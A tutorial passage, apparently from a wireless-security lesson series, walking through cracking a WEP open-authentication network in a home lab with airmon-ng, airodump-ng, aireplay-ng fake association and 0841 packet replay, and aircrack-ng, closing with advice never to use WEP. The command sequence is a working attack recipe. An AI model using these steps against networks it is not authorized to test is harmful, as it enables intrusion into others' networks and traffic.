8 – Open Authentication (OA) – WEP OPN – Interactive Packet Replay attack

Similar to the previous lesson in which we obtained the Shared Key eventually through decrypting the key over the air, we didn’t even have to authenticate with the access point in order obtain the key. We don’t need to provide credentials to the access point during authentication, any client can actually connect, WEP open system authentication however encrypts the data frames so in order to read this data we will require the correct key.

Open Authentication unlike the name suggests is actually advisable to use over shared key authentication. Both of these authentication mechanisms are weak as I am sure you understand by now and have been replaced by WPA/WPA2 for securing your network using a Shared Key similar to what would have been used with WEP SKA.

Let’s get to it!:

Configure your access point to the following settings1 - Open System Authentication Configuration 1

1 - Open System Authentication Configuration 2You definitely can set your card into monitor mode now and you know that you need to do that first so do it with:

airmon-ng start wlan0 6

The “6” at the end will run the card on channel 6 for you2 - Enable monitor modeNext Start airodump-ng with:

airodump-ng –bssid 00:18:E7:XX:XX:XX –channel 6 -w testcapture mon0

“–bssid” is for your AP_MAC
“–channel 6” is for setting channel 6
“-w testcapture” will write to a file called testcapture
“mon0” is your wireless card interface3 - Start airodumpAirodump-ng output will look like the following:4 - airodump outputNote that like the Shared Key Authentication the AUTH in this case is “OPN” for Open System Authentication.

Associate with the access point

aireplay-ng -1 0 -e test -a 00:18:E7:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon05 - associate with access pointSuccess associating looks like the following:6 - associate success with access pointStarting the 0841 interactive packet replay attack7 - WEP 0841 attack“-2” is for interactive frame selection and starting the interactive packet replay

“-p 0841” sets the Frame Control Field so that the packet looks like it is coming from a wireless client
“-c FF:FF:FF:FF:FF:FF” sets the destination MAC as broadcast. Required to cause the AP to replay the packet and thus gets a new IV
“-b” is the AP MAC address
“-h” is the MAC of YOUR Card

You will need to select a packet, feel free to select “no” until you get something slightly bigger than a size of 86 if you want, I personally find you have better success if you do this.

Looking at the bottom left once you have selected a packet you will then see injection start and your packets per second should rise also as you can see I have 499 pps below.

7.1 WEP 0841 output select packetCheck your airodump output and you should see your frames and data have risen greatly so check your capture directory and then run aircrack-ng8 - Check capture directoryStart aircrack-ng with:

aircrack-ng -b 00:18:E7:XX:XX:XX testcapture*.cap

“-b” to select your AP_MAC
“testcapture*.cap” will run aircrack-ng against all your capture files in the directory with the name testcapture-X.cap9 - Start aircrackAfter a short period of time success looks like this:10 - aircrack success


Lesson Learned:

WEP Open system authentication is no better at protecting your privacy than WEP shared key authentication and with a few minutes and patience can be easily compromised and give an attacker access to your internal resources. Don’t rely on WEP at all, do not use it, it is not secure at all and trivial to crack.


Leave a Reply